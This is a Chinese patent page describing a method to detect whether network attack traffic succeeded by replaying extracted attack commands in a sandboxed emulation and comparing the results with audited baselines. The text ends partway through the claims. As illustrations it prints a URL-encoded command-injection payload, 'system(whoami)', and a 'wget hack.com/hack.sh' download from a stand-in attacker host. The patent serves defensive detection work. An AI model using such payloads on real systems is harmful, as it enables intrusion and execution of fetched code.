CN115051873B - 网络攻击结果检测方法、装置和计算可读存储介质 - Google Patents
网络攻击结果检测方法、装置和计算可读存储介质 Download PDFInfo
- Publication number
- CN115051873B CN115051873B CN202210892150.2A CN202210892150A CN115051873B CN 115051873 B CN115051873 B CN 115051873B CN 202210892150 A CN202210892150 A CN 202210892150A CN 115051873 B CN115051873 B CN 115051873B
- Authority
- CN
- China
- Prior art keywords
- attack
- network environment
- preset
- command
- network
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Active
Links
- 238000001514 detection method Methods 0.000 title claims abstract description 35
- 238000000034 method Methods 0.000 claims abstract description 29
- 230000006399 behavior Effects 0.000 claims description 71
- 230000004044 response Effects 0.000 claims description 48
- 238000004088 simulation Methods 0.000 claims description 37
- 239000013598 vector Substances 0.000 claims description 29
- 238000004458 analytical method Methods 0.000 claims description 12
- 238000013136 deep learning model Methods 0.000 claims description 12
- 238000012550 audit Methods 0.000 claims description 10
- 239000011159 matrix material Substances 0.000 claims description 8
- 230000006870 function Effects 0.000 claims description 7
- 230000011218 segmentation Effects 0.000 claims description 4
- 238000012549 training Methods 0.000 claims description 4
- 238000012217 deletion Methods 0.000 claims description 2
- 230000037430 deletion Effects 0.000 claims description 2
- 238000000605 extraction Methods 0.000 claims description 2
- 238000010586 diagram Methods 0.000 description 6
- 230000002085 persistent effect Effects 0.000 description 6
- 238000004590 computer program Methods 0.000 description 4
- 238000005516 engineering process Methods 0.000 description 4
- 238000002347 injection Methods 0.000 description 3
- 239000007924 injection Substances 0.000 description 3
- 230000003287 optical effect Effects 0.000 description 3
- 238000012545 processing Methods 0.000 description 3
- 230000000295 complement effect Effects 0.000 description 2
- 238000003066 decision tree Methods 0.000 description 2
- 239000000284 extract Substances 0.000 description 2
- 239000002356 single layer Substances 0.000 description 2
- 239000000243 solution Substances 0.000 description 2
- 238000003491 array Methods 0.000 description 1
- 238000013528 artificial neural network Methods 0.000 description 1
- 238000012098 association analyses Methods 0.000 description 1
- 230000005540 biological transmission Effects 0.000 description 1
- 230000000903 blocking effect Effects 0.000 description 1
- 238000006243 chemical reaction Methods 0.000 description 1
- 230000007123 defense Effects 0.000 description 1
- 238000011161 development Methods 0.000 description 1
- 230000018109 developmental process Effects 0.000 description 1
- 239000002355 dual-layer Substances 0.000 description 1
- 230000008030 elimination Effects 0.000 description 1
- 238000003379 elimination reaction Methods 0.000 description 1
- 239000013604 expression vector Substances 0.000 description 1
- 230000006872 improvement Effects 0.000 description 1
- 239000010410 layer Substances 0.000 description 1
- 238000012986 modification Methods 0.000 description 1
- 230000004048 modification Effects 0.000 description 1
- 239000004065 semiconductor Substances 0.000 description 1
- 230000003068 static effect Effects 0.000 description 1
- 238000013526 transfer learning Methods 0.000 description 1
Classifications
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1408—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
- H04L63/1416—Event detection, e.g. attack signature detection
-
- Y—GENERAL TAGGING OF NEW TECHNOLOGICAL DEVELOPMENTS; GENERAL TAGGING OF CROSS-SECTIONAL TECHNOLOGIES SPANNING OVER SEVERAL SECTIONS OF THE IPC; TECHNICAL SUBJECTS COVERED BY FORMER USPC CROSS-REFERENCE ART COLLECTIONS [XRACs] AND DIGESTS
- Y02—TECHNOLOGIES OR APPLICATIONS FOR MITIGATION OR ADAPTATION AGAINST CLIMATE CHANGE
- Y02D—CLIMATE CHANGE MITIGATION TECHNOLOGIES IN INFORMATION AND COMMUNICATION TECHNOLOGIES [ICT], I.E. INFORMATION AND COMMUNICATION TECHNOLOGIES AIMING AT THE REDUCTION OF THEIR OWN ENERGY USE
- Y02D30/00—Reducing energy consumption in communication networks
- Y02D30/50—Reducing energy consumption in communication networks in wire-line communication networks, e.g. low power modes or reduced link rate
Landscapes
- Engineering & Computer Science (AREA)
- Computer Security & Cryptography (AREA)
- Computer Hardware Design (AREA)
- Computing Systems (AREA)
- General Engineering & Computer Science (AREA)
- Computer Networks & Wireless Communication (AREA)
- Signal Processing (AREA)
- Data Exchanges In Wide-Area Networks (AREA)
Abstract
本申请涉及一种网络攻击结果检测方法、装置和计算可读存储介质。该方法包括:确定目标流量是否为攻击流量;若确定目标流量为攻击流量,则提取攻击流量中的攻击命令;模拟攻击命令在真实网络环境的执行,得到攻击命令的模拟执行数据;将攻击命令的模拟执行数据与预设结果相比,确定目标流量在真实网络环境中是否成功实施攻击。本申请提供的方案能够精准确定目标流量在真实网络环境中是否成功实施攻击。
Description
技术领域
本申请涉及网络安全领域,尤其涉及网络攻击结果检测方法、装置和计算可读存储介质。
背景技术
在计算机网络技术飞速发展的当今,网络攻防变得愈加激烈,网络扫描呈指数级上升。如何从海量的攻击日志中识别到攻击成功的那一个或一些日志,从而采取相应的对策就显得十分重要,对网络安全人员也是一个巨大的挑战。
考虑到无论是正常的请求访问还是非法访问一个目标网站,该目标网站会返回一个响应。鉴于上述事实,相关技术中,网络攻击结果检测方法是预设一些规则;通过审计某个请求的响应包是否与预设的规则匹配;若响应包与预设的规则匹配成功,则确定该某个请求访问目标网站属于非法访问即涉嫌网络攻击。
尽管上述基于预设规则的网络攻击结果检测方法实施起来较为容易,然而,攻击者在实施网络攻击后,可以对返回的响应包的内容进行伪装、篡改等,使伪装和/或篡改后的响应包符合这些预设规则,从而骗过网络攻击结果检测方案,放过了该攻击行为。
发明内容
为解决或部分解决相关技术中存在的问题,本申请提供一种网络攻击结果检测方法、装置和计算可读存储介质,可以精确检测出真正成功实施了网络攻击的行为。
本申请第一方面提供一种网络攻击结果检测方法,包括:
确定目标流量是否为攻击流量;
若确定所述目标流量为攻击流量,则提取所述攻击流量中的攻击命令;
模拟所述攻击命令在真实网络环境的执行,得到所述攻击命令的模拟执行数据;
将所述攻击命令的模拟执行数据与预设结果相比,确定所述目标流量在所述真实网络环境中是否成功实施攻击。
本申请第二方面提供一种网络攻击结果检测装置,包括:
第一确定模块,用于确定目标流量是否为攻击流量;
提取模块,用于若确定所述目标流量为攻击流量,则提取所述攻击流量中的攻击命令;
模拟模块,用于模拟所述攻击命令在真实网络环境的执行,得到所述攻击命令的模拟执行数据;
第二确定模块,用于将所述攻击命令的模拟执行数据与预设结果相比,确定所述目标流量在所述真实网络环境中是否成功实施攻击。
本申请第三方面提供一种电子设备,包括:
处理器;以及
存储器,其上存储有可执行代码,当所述可执行代码被所述处理器执行时,使所述处理器执行如上所述的方法。
本申请第四方面提供一种计算机可读存储介质,其上存储有可执行代码,当所述可执行代码被电子设备的处理器执行时,使所述处理器执行如上所述的方法。
本申请提供的技术方案可知,本申请的技术方案是在确定目标流量为攻击流量后,通过模拟从攻击流量中提取的攻击命令在真实网络环境的执行,将这些攻击命令的模拟执行数据与预设结果相比,确定目标流量在真实网络环境中是否成功实施攻击。与相关技术是基于预设规则的网络攻击结果检测方法,攻击者在实施网络攻击后可以对返回的响应包的内容进行伪装、篡改等,使伪装和/或篡改后的响应包符合这些预设规则相比,由于攻击命令的模拟执行数据与攻击命令在真实网络环境的执行数据高度相似,而网络攻击者不可能去伪装和/或篡改模拟执行数据(因模拟执行数据是在仿真网络环境得到),因此,通过将攻击命令的模拟执行数据与预设结果相比,能够精准确定目标流量在真实网络环境中是否成功实施攻击。
应当理解的是,以上的一般描述和后文的细节描述仅是示例性和解释性的,并不能限制本申请。
附图说明
通过结合附图对本申请示例性实施方式进行更详细地描述,本申请的上述以及其它目的、特征和优势将变得更加明显,其中,在本申请示例性实施方式中,相同的参考标号通常代表相同部件。
图1a是本申请实施例提供的网络攻击结果检测方法应用场景示意图;
图1b是本申请实施例提供的网络攻击结果检测方法的流程示意图;
图2是本申请实施例提供的网络攻击结果检测装置的结构示意图;
图3是本申请实施例提供的电子设备的结构示意图。
具体实施方式
下面将参照附图更详细地描述本申请的实施方式。虽然附图中显示了本申请的实施方式,然而应该理解,可以以各种形式实现本申请而不应被这里阐述的实施方式所限制。相反,提供这些实施方式是为了使本申请更加透彻和完整,并且能够将本申请的范围完整地传达给本领域的技术人员。
在本申请使用的术语是仅仅出于描述特定实施例的目的,而非旨在限制本申请。在本申请和所附权利要求书中所使用的单数形式的“一种”、“所述”和“该”也旨在包括多数形式,除非上下文清楚地表示其他含义。还应当理解,本文中使用的术语“和/或”是指并包含一个或多个相关联的列出项目的任何或所有可能组合。
应当理解,尽管在本申请可能采用术语“第一”、“第二”、“第三”等来描述各种信息,但这些信息不应限于这些术语。这些术语仅用来将同一类型的信息彼此区分开。例如,在不脱离本申请范围的情况下,第一信息也可以被称为第二信息,类似地,第二信息也可以被称为第一信息。由此,限定有“第一”、“第二”的特征可以明示或者隐含地包括一个或者更多个该特征。在本申请的描述中,“多个”的含义是两个或两个以上,除非另有明确具体的限定。
如何从海量的攻击日志中识别到攻击成功的那一个或一些日志,从而采取相应的对策就显得十分重要,对网络安全人员也是一个巨大的挑战。考虑到无论是正常的请求访问还是非法访问一个目标网站,该目标网站会返回一个响应。鉴于上述事实,相关技术中,网络攻击结果检测方法是预设一些规则;通过审计某个请求的响应包是否与预设的规则匹配;若响应包与预设的规则匹配成功,则确定该某个请求访问目标网站属于非法访问即涉嫌网络攻击。尽管上述基于预设规则的网络攻击结果检测方法实施起来较为容易,然而,攻击者在实施网络攻击后,可以对返回的响应包的内容进行伪装、篡改等,使伪装和/或篡改后的响应包符合这些预设规则,从而骗过网络攻击结果检测方案,放过了该攻击行为,认为相应的日志不是攻击行为产生的日志。
针对上述问题,本申请实施例提供一种网络攻击结果检测方法,可以精确检测出真正成功实施了网络攻击的行为。
以下结合附图详细描述本申请实施例的技术方案。
如图1a所示,是本申请实施例提供的网络攻击结果检测方法应用场景示意图。在该应用场景中,攻击者终端101发出一条试图对受保护服务器104访问的请求,该请求通过互联网102以流量的形式传输。流量监控器103实时或事后对来自攻击者终端101的这些流量(后续称为目标流量)进行提取和分析,首先确定这些目标流量是否为攻击流量。若确定这些目标流量为正常流量,则放行该正常流量,以对受保护服务器104进行正常访问。若确定这些目标流量为攻击流量,则流量监控器103一方面对该攻击流量进行截获,防止其到达受保护服务器104;另一方面,流量监控器103提取攻击流量中的攻击命令,并模拟该攻击命令在真实网络环境的执行,得到攻击命令的模拟执行数据。在得到攻击命令的模拟执行数据后,流量监控器103将攻击命令的模拟执行数据与预设结果相比,确定目标流量在真实网络环境中是否成功实施攻击,例如,将攻击命令在仿真网络环境执行后实施的网络行为与预设网络行为相比和/或将攻击命令在仿真网络环境执行后的回显信息与预设响应包相比,若攻击命令在仿真网络环境执行后实施的网络行为与预设网络行为的相似度超过第一预设相似度阈值,和/或若攻击命令在仿真网络环境执行后的回显信息与预设响应包的相似度超过第二预设相似度阈值,则确定目标流量在真实网络环境中成功实施攻击。在确定目标流量在真实网络环境中成功实施攻击后,流量监控器103将该目标流量鉴定为威胁事件,除了及时阻止攻击者终端101对受保护服务器104的访问之外,向后台保护中心上报攻击者终端101的相关信息,例如IP地址和MAC地址等。
参见图1b,是本申请实施例示出的网络攻击结果检测方法的流程示意图。图1b示例的方法可应用于图1a示例的流量监控器103,主要包括步骤S101至步骤S104,说明如下:
步骤S101:确定目标流量是否为攻击流量。
此处,目标流量是来自于真实网络环境中一条需要被确定是否为攻击流量的流量,该流量可以是对某个目标网站的访问请求,例如,一个统一资源定位符(UniformResource Locator,URL),而攻击流量是相对白流量而言的数据,其可能是一段对网络有威胁,运行起来会对网络造成非法入侵的代码或命令。作为本申请一个实施例,确定目标流量是否为攻击流量可以通过步骤S1011和步骤S1012实现,说明如下:
步骤S1011:对目标流量进行解码,得到目标流量中的净载荷。
在http协议中,往往会使用base64、url、html实体编码等来对访问请求等内容进行编码,净载荷(payload)或攻击载荷是包含在这些经过编码后的内容中。例如,“?id=%73%79%73%74%65%6d%28%77%68%6f%61%6d%69%29%3b”即是一条对URL进行了编码的流量。至于攻击载荷,是指专门用于验证、利用漏洞的代码片段,该片段具有攻击行为或者具有对漏洞是否存在进行验证的行为。只有通过对经过编码的目标流量进行解码,才能得到其中的净载荷。
步骤S1012:基于语法和语义引擎对净载荷进行检测,识别目标流量是否为攻击流量。
在解码出目标流量中的净载荷之后,可以基于语法和语义引擎对净载荷进行检测,识别目标流量是否为攻击流量,例如,识别该攻击流量是代码注入、命令注入还是反序列化,等等。作为本申请一个实施例,基于语法和/或语义引擎对净载荷进行检测,识别目标流量是否为攻击流量可以是:提取净载荷的关键信息;基于语法和语义引擎对净载荷的关键信息进行词法分析和语法分析,得到抽象语法树;根据预设模型对抽象语法树的代码逻辑进行判断检测,识别目标流量是否为攻击流量。上述实施例中,基于语法和语义引擎对净载荷的关键信息进行词法分析和语法分析,得到抽象语法树可以是:利用词法分析器依次读取净载荷的关键信息中的字符,进行字符分析;按照预定的规则将这些字符合并成标记;选取当前网页解释器使用的分析器,采用分析器提取解释器标准定义规则文件;语法分析器根据标准定义语法规则还原语法中的程序逻辑,从而构建完整的抽象语法树。至于根据预设模型对抽象语法树的代码逻辑进行判断检测,识别目标流量是否为攻击流量,可以是根据预设算法得到最佳的单层决策树,再基于该最佳的单层决策树进行关联分析,实现通过上下逻辑的分析,目标流量是否为攻击流量,例如,是否为命令注入类型的攻击流量或代码注入类型的攻击流量。
作为本申请另一实施例,基于语法和/或语义引擎对净载荷进行检测,识别目标流量是否为攻击流量还可以是:对净载荷进行分词并转换成标准表达形式,得到语句集合;将该语句集合中每个词转化为向量,得到词向量矩阵;将这些词向量矩阵输入预先训练的深度学习模型,识别目标流量是否为攻击流量,其中,预先训练的深度学习模型时基于语法和语义引擎对深度学习模型进行训练后得到的模型。上述实施例中,由于预先训练的深度学习模型时基于语法和语义引擎对深度学习模型进行训练后得到的模型,因此,可以使用预设算法进行迁移学习,得到每个词的补充特征向量,将补充特征向量和输入的特征表示向量进行整合后,将整合后特征向量输入预先训练的深度学习模型进行语法和语义的特征学习,从而识别目标流量是否为攻击流量以及是何种类型的攻击流量。至于对净载荷进行分词并转换成标准表达形式,得到语句集合具体可以是:选取特殊符号构成特殊符号集;遍历净载荷中所有字符,当字符匹配上特殊符号集中任一特殊符号时,通过在该字符的左右两侧加上空格对字符进行替换,将关键词和符号进行分隔。此外,将该语句集合中每个词转化为向量,得到词向量矩阵可以是将该语句集合输入word2vec模型,预测给定单词的关联度大的单词,并计算得到一个数值矩阵,矩阵的行表示每一个词的词向量,其中,word2vec模型为只有一个隐层的全连接神经网络。
步骤S102:若确定目标流量为攻击流量,则提取攻击流量中的攻击命令。
具体地,作为本申请一个实施例,若确定目标流量为攻击流量,则提取攻击流量中的攻击命令可以是:若确定目标流量为攻击流量,则将攻击流量中的冗余信息删除;通过语法和语义分析,将删除冗余信息后的攻击流量与预设敏感函数库中的敏感函数匹配;若匹配到敏感函数,则提取删除冗余信息后的攻击流量中的攻击命令。例如,假设从“?id=%73%79%73%74%65%6d%28%77%68%6f%61%6d%69%29%3b”解码出如“?id=;;;;system(whoami);”的净载荷,则在解析该净载荷时,首先定位到“system”这种类型的命令执行函数,然后将前面复杂闭合的“;;;;”给去掉,通过代码注入攻击检测方法,将“;;;;”自适应去掉,通过语法和语义分析解析出system,从而将攻击流量中的攻击命令“whoami”提取出来,送入到后续的处理模块。
步骤S103:模拟攻击命令在真实网络环境的执行,得到攻击命令的模拟执行数据。
在网络攻击结果检测方法的相关技术中,是基于预设规则的网络攻击结果检测方法,攻击者在实施网络攻击后可以对返回的响应包的内容进行伪装、篡改等,使伪装和/或篡改后的响应包符合这些预设规则。与相关技术不同,本申请是将从攻击流量中提取出来的攻击命令,模拟其在真实网络环境的执行而得到攻击命令的模拟执行数据,例如,通过将从攻击流量中提取出来的攻击命令输入仿真网络环境执行后得到攻击命令的模拟执行数据。
作为本申请一个实施例,模拟攻击命令在真实网络环境的执行,得到攻击命令的模拟执行数据可以通过步骤S1031和步骤S1032实现,说明如下:
步骤S1031:配置仿真网络环境,其中,仿真网络环境为对真实网络环境的仿真。
在本申请实施例中,仿真网络环境为对真实网络环境的仿真。配置仿真网络环境可以是通过虚拟化技术,配置仿真网络环境,其中,虚拟化技术可以是基于通过虚拟机、快照、docker等技术。具体地,通过虚拟化技术,配置仿真网络环境可以是通过上述虚拟机、快照、docker等技术,配置虚拟资源信息,将攻击命令执行的环境与真实网络环境隔离,这个与真实网络环境隔离的环境可以视为是仿真网络环境,或者,配置出真实网络环境的镜像,将攻击命令输入其中执行,这个真实网络环境的镜像亦可以视为是一个仿真网络环境。通过这些虚拟化技术,使得模拟攻击命令在真实网络环境的执行时,真实网络环境不会受到影响。
步骤S1032:将攻击命令输入仿真网络环境模拟攻击命令在真实环境的执行,攻击命令在仿真网络环境的执行数据作为攻击命令的模拟执行数据。
一方面,由于攻击命令的模拟执行数据与攻击命令在真实网络环境的执行数据高度相似,因此,可以将攻击命令的模拟执行数据视为是攻击命令在真实网络环境的执行数据;另一方面,由于攻击者不可能攻击到执行攻击命令的仿真网络环境,因此,攻击者不可能伪装和/或篡改攻击命令的模拟执行数据。在本申请实施例中,攻击命令的模拟执行数据可以是攻击命令在仿真网络环境执行后实施的网络行为和攻击命令在该仿真网络环境执行后的回显信息。例如,假设通过对前述实施例的攻击命令“whoami”在仿真网络环境执行后的特征分析,其中,攻击命令在仿真网络环境执行后实施的网络行为“wget hack.com/hack.sh”,意为从目标网站hack.com获取一个可执行的文件;攻击命令在该仿真网络环境执行后的回显信息为ifconfig,意为内网网络信息。
步骤S104:将攻击命令的模拟执行数据与预设结果相比,确定目标流量在真实网络环境中是否成功实施攻击。
具体地,作为本申请一个实施例,将攻击命令的模拟执行数据与预设结果相比,确定目标流量在真实网络环境中是否成功实施攻击可以是:将攻击命令在仿真网络环境执行后实施的网络行为与预设网络行为相比;若攻击命令在仿真网络环境执行后实施的网络行为与预设网络行为的相似度超过第一预设相似度阈值,则初次确定目标流量在真实网络环境中成功实施攻击;若攻击命令在仿真网络环境执行后实施的网络行为与预设网络行为的相似度不超过第一预设相似度阈值,则将攻击命令在仿真网络环境执行后的回显信息与预设响应包相比;若攻击命令在仿真网络环境执行后的回显信息与预设响应包的相似度超过第二预设相似度阈值,则再次确定目标流量在真实网络环境中成功实施攻击;其中,预设网络行为包括通过安全审计得到的网络行为,预设响应包为通过安全审计得到的攻击请求包对应的响应包,此处,通过安全审计得到的网络行为是指通过安全产品对受害者服务器受到的攻击进行审计后确认的网络行为;进一步地,预设网络行为可以是对通过安全审计得到的网络行为向量化的结果,即预设网络行为一个向量,类似地,预设响应包亦可以是一个向量。至于将攻击命令在仿真网络环境执行后实施的网络行为与预设网络行为相比,可以先将攻击命令在仿真网络环境执行后实施的网络行为向量化,得到一个向量,然后,计算该向量与预设网络行为对应向量的距离,该距离用于衡量攻击命令在仿真网络环境执行后实施的网络行为与预设网络行为的相似度;类似地,亦可以计算预设响应包对应向量与攻击命令在仿真网络环境执行后的回显信息对应向量的距离,然后,计算两个向量之间的距离,该距离用于衡量攻击命令在仿真网络环境执行后的回显信息与预设响应包的相似度。需要说明的是,亦无需对攻击命令在仿真网络环境执行后实施的网络行为、攻击命令在仿真网络环境执行后的回显信息、预设网络行为和预设响应包向量化,而是直接计算攻击命令在仿真网络环境执行后实施的网络行为对应字符与预设网络行为对应字符的距离,例如,Levenshtein distance,该距离用于衡量攻击命令在仿真网络环境执行后实施的网络行为与预设网络行为的相似度;类似地,亦可以直接计算攻击命令在仿真网络环境执行后的回显信息对应字符与预设响应包对应字符的Levenshtein distance,该距离用于衡量攻击命令在仿真网络环境执行后的回显信息与预设响应包的相似度。通过上述初次确定目标流量在真实网络环境中成功实施攻击和再次确定目标流量在真实网络环境中成功实施攻击,最终可以确定目标流量在真实网络环境中成功实施攻击。
上述实施例中,攻击命令的模拟执行数据亦可以只包含攻击命令在仿真网络环境执行后实施的网络行为,相应地,将攻击命令的模拟执行数据与预设结果相比,确定目标流量在真实网络环境中是否成功实施攻击可以是:将攻击命令在仿真网络环境执行后实施的网络行为与预设网络行为相比,若攻击命令在仿真网络环境执行后实施的网络行为与预设网络行为的相似度超过预设相似度阈值,则确定目标流量在真实网络环境中成功实施攻击,其中,预设网络行为包括通过安全审计得到的网络行为。与前述实施例类似,此处将攻击命令在仿真网络环境执行后实施的网络行为与预设网络行为相比,可以先将攻击命令在仿真网络环境执行后实施的网络行为向量化,得到一个向量,然后,计算该向量与预设网络行为对应向量的距离,该距离用于衡量攻击命令在仿真网络环境执行后实施的网络行为与预设网络行为的相似度。需要说明的是,亦无需对攻击命令在仿真网络环境执行后实施的网络行为和预设网络行为向量化,而是直接计算攻击命令在仿真网络环境执行后实施的网络行为对应字符与预设网络行为对应字符的距离,例如,Levenshtein distance,该距离用于衡量攻击命令在仿真网络环境执行后实施的网络行为与预设网络行为的相似度。
在本申请另一实施例中,攻击命令的模拟执行数据亦可以只包含攻击命令在仿真网络环境执行后的回显信息,相应地,将攻击命令的模拟执行数据与预设结果相比,确定目标流量在真实网络环境中是否成功实施攻击可以是:将攻击命令在仿真网络环境执行后的回显信息与预设响应包相比,若攻击命令在仿真网络环境执行后的回显信息与预设响应包的相似度超过预设相似度阈值,则确定目标流量在真实网络环境中成功实施攻击,其中,预设响应包为通过安全审计得到的攻击请求包对应的响应包。与前述实施例类似,此处将攻击命令在仿真网络环境执行后的回显信息与预设响应包相比亦可以计算预设响应包对应向量与攻击命令在仿真网络环境执行后的回显信息对应向量的距离,然后,计算两个向量之间的距离,该距离用于衡量攻击命令在仿真网络环境执行后的回显信息与预设响应包的相似度。需要说明的是,亦无需对攻击命令在仿真网络环境执行后的回显信息和预设响应包向量化,而是直接计算攻击命令在仿真网络环境执行后的回显信息对应字符与预设响应包对应字符的Levenshtein distance,该距离用于衡量攻击命令在仿真网络环境执行后的回显信息与预设响应包的相似度。
从上述图1示例的网络攻击结果检测方法可知,本申请的技术方案是在确定目标流量为攻击流量后,通过模拟从攻击流量中提取的攻击命令在真实网络环境的执行,将这些攻击命令的模拟执行数据与预设结果相比,确定目标流量在真实网络环境中是否成功实施攻击。与相关技术是基于预设规则的网络攻击结果检测方法,攻击者在实施网络攻击后可以对返回的响应包的内容进行伪装、篡改等,使伪装和/或篡改后的响应包符合这些预设规则相比,由于攻击命令的模拟执行数据与攻击命令在真实网络环境的执行数据高度相似,而网络攻击者不可能去伪装和/或篡改模拟执行数据(因模拟执行数据是在仿真网络环境得到),因此,通过将攻击命令的模拟执行数据与预设结果相比,能够精准确定目标流量在真实网络环境中是否成功实施攻击。
参见图2,是本申请实施例示出的网络攻击结果检测装置的结构示意图。为了便于说明,仅示出了与本申请实施例相关的部分。图2示例的网络攻击结果检测装置主要包括第一确定模块201、提取模块202、模拟模块203和第二确定模块204,其中:
第一确定模块201,用于确定目标流量是否为攻击流量;
提取模块202,用于若确定目标流量为攻击流量,则提取攻击流量中的攻击命令;
模拟模块203,用于模拟攻击命令在真实网络环境的执行,得到攻击命令的模拟执行数据;
第二确定模块204,用于将攻击命令的模拟执行数据与预设结果相比,确定目标流量在真实网络环境中是否成功实施攻击。
关于上述实施例中的装置,其中各个模块执行操作的具体方式已经在有关该方法的实施例中进行了详细描述,此处将不再做详细阐述说明。
从上述图2示例的网络攻击结果检测装置可知,本申请的技术方案是在确定目标流量为攻击流量后,通过模拟从攻击流量中提取的攻击命令在真实网络环境的执行,将这些攻击命令的模拟执行数据与预设结果相比,确定目标流量在真实网络环境中是否成功实施攻击。与相关技术是基于预设规则的网络攻击结果检测方法,攻击者在实施网络攻击后可以对返回的响应包的内容进行伪装、篡改等,使伪装和/或篡改后的响应包符合这些预设规则相比,由于攻击命令的模拟执行数据与攻击命令在真实网络环境的执行数据高度相似,而网络攻击者不可能去伪装和/或篡改模拟执行数据(因模拟执行数据是在仿真网络环境得到),因此,通过将攻击命令的模拟执行数据与预设结果相比,能够精准确定目标流量在真实网络环境中是否成功实施攻击。
图3是本申请实施例示出的电子设备的结构示意图。
参见图3,电子设备300包括存储器310和处理器320。
处理器320可以是中央处理单元(Central Processing Unit,CPU),还可以是其他通用处理器、数字信号处理器(Digital Signal Processor,DSP)、专用集成电路(Application Specific Integrated Circuit,ASIC)、现场可编程门阵列(Field-Programmable Gate Array,FPGA)或者其他可编程逻辑器件、分立门或者晶体管逻辑器件、分立硬件组件等。通用处理器可以是微处理器或者该处理器也可以是任何常规的处理器等。
存储器310可以包括各种类型的存储单元,例如系统内存、只读存储器(ROM)和永久存储装置。其中,ROM可以存储处理器320或者计算机的其他模块需要的静态数据或者指令。永久存储装置可以是可读写的存储装置。永久存储装置可以是即使计算机断电后也不会失去存储的指令和数据的非易失性存储设备。在一些实施方式中,永久性存储装置采用大容量存储装置(例如磁或光盘、闪存)作为永久存储装置。另外一些实施方式中,永久性存储装置可以是可移除的存储设备(例如软盘、光驱)。系统内存可以是可读写存储设备或者易失性可读写存储设备,例如动态随机访问内存。系统内存可以存储一些或者所有处理器在运行时需要的指令和数据。此外,存储器310可以包括任意计算机可读存储媒介的组合,包括各种类型的半导体存储芯片(例如DRAM,SRAM,SDRAM,闪存,可编程只读存储器),磁盘和/或光盘也可以采用。在一些实施方式中,存储器310可以包括可读和/或写的可移除的存储设备,例如激光唱片(CD)、只读数字多功能光盘(例如DVD-ROM,双层DVD-ROM)、只读蓝光光盘、超密度光盘、闪存卡(例如SD卡、min SD卡、Micro-SD卡等)、磁性软盘等。计算机可读存储媒介不包含载波和通过无线或有线传输的瞬间电子信号。
存储器310上存储有可执行代码,当可执行代码被处理器320处理时,可以使处理器320执行上文述及的方法中的部分或全部。
此外,根据本申请的方法还可以实现为一种计算机程序或计算机程序产品,该计算机程序或计算机程序产品包括用于执行本申请的上述方法中部分或全部步骤的计算机程序代码指令。
或者,本申请还可以实施为一种计算机可读存储介质(或非暂时性机器可读存储介质或机器可读存储介质),其上存储有可执行代码(或计算机程序或计算机指令代码),当可执行代码(或计算机程序或计算机指令代码)被电子设备(或服务器等)的处理器执行时,使处理器执行根据本申请的上述方法的各个步骤的部分或全部。
以上已经描述了本申请的各实施例,上述说明是示例性的,并非穷尽性的,并且也不限于所披露的各实施例。在不偏离所说明的各实施例的范围和精神的情况下,对于本技术领域的普通技术人员来说许多修改和变更都是显而易见的。本文中所用术语的选择,旨在最好地解释各实施例的原理、实际应用或对市场中的技术的改进,或者使本技术领域的其他普通技术人员能理解本文披露的各实施例。
Claims (10)
1.一种网络攻击结果检测方法,其特征在于,所述方法包括:
对目标流量进行解码,得到所述目标流量中的净载荷;
对所述净载荷进行分词并转换成标准表达形式,得到语句集合;
将所述语句集合中每个词转化为向量,得到词向量矩阵;
将所述词向量矩阵输入预先训练的深度学习模型,识别所述目标流量是否为攻击流量,所述预先训练的深度学习模型是基于语法和语义引擎对深度学习模型进行训练后得到的模型;
若确定所述目标流量为攻击流量,则提取所述攻击流量中的攻击命令;
模拟所述攻击命令在真实网络环境的执行,得到所述攻击命令的模拟执行数据;
将所述攻击命令的模拟执行数据与预设结果相比,确定所述目标流量在所述真实网络环境中是否成功实施攻击。
2.根据权利要求1所述的网络攻击结果检测方法,其 特征在于,所述基于语法和/或语义引擎对所述净载荷进行检测,识别所述目标流量是否为攻击流量,包括:
提取所述净载荷的关键信息;
基于所述语法和语义引擎对所述净载荷的关键信息进行词法分析和语法分析,得到抽象语法树;
根据预设模型对所述抽象语法树的代码逻辑进行判断检测,识别所述目标流量是否为攻击流量。
3.根据权利要求1所述的网络攻击结果检测方法,其特征在于,所述若确定所述目标流量为攻击流量,则提取所述攻击流量中的攻击命令,包括:
若确定所述目标流量为攻击流量,则将所述攻击流量中的冗余信息删除;
通过语法和语义分析,将删除冗余信息后的攻击流量与预设敏感函数库中的敏感函数匹配;
若匹配到所述敏感函数,则提取删除冗余信息后的攻击流量中的攻击命令。
4.根据权利要求1所述的网络攻击结果检测方法,其特征在于,所述模拟所述攻击命令在真实网络环境的执行,得到所述攻击命令的模拟执行结果,包括:
配置仿真网络环境,所述仿真网络环境为对所述真实网络环境的仿真;
将所述攻击命令输入所述仿真网络环境模拟所述攻击命令在所述真实网络环境的执行,所述攻击命令在所述仿真网络环境的执行数据作为所述攻击命令的模拟执行数据。
5.根据权利要求4所述的网络攻击结果检测方法,其特征在于,所述攻击命令的模拟执行数据包括所述攻击命令在所述仿真网络环境执行后实施的网络行为,所述将所述攻击命令的模拟执行数据与预设结果相比,确定所述目标流量在所述真实网络环境中是否成功实施攻击,包括:
将所述攻击命令在所述仿真网络环境执行后实施的网络行为与预设网络行为相比,所述预设网络行为包括通过安全审计得到的网络行为;
若所述攻击命令在所述仿真网络环境执行后实施的网络行为与所述预设网络行为的相似度超过预设相似度阈值,则确定所述目标流量在所述真实网络环境中成功实施攻击。
6.根据权利要求4所述的网络攻击结果检测方法,其特征在于,所述攻击命令的模拟执行数据包括所述攻击命令在所述仿真网络环境执行后的回显信息,所述将所述攻击命令的模拟执行数据与预设结果相比,确定所述目标流量在所述真实网络环境中是否成功实施攻击,包括:
将所述攻击命令在所述仿真网络环境执行后的回显信息与预设响应包相比,所述预设响应包为通过安全审计得到的攻击请求包对应的响应包;
若所述攻击命令在所述仿真网络环境执行后的回显信息与所述预设响应包的相似度超过预设相似度阈值,则确定所述目标流量在所述真实网络环境中成功实施攻击。
7.根据权利要求4所述的网络攻击结果检测方法,其特征在于,所述攻击命令的模拟执行数据包括所述攻击命令在所述仿真网络环境执行后实施的网络行为和回显信息,所述将所述攻击命令的模拟执行数据与预设结果相比,确定所述目标流量在所述真实网络环境中是否成功实施攻击,包括:
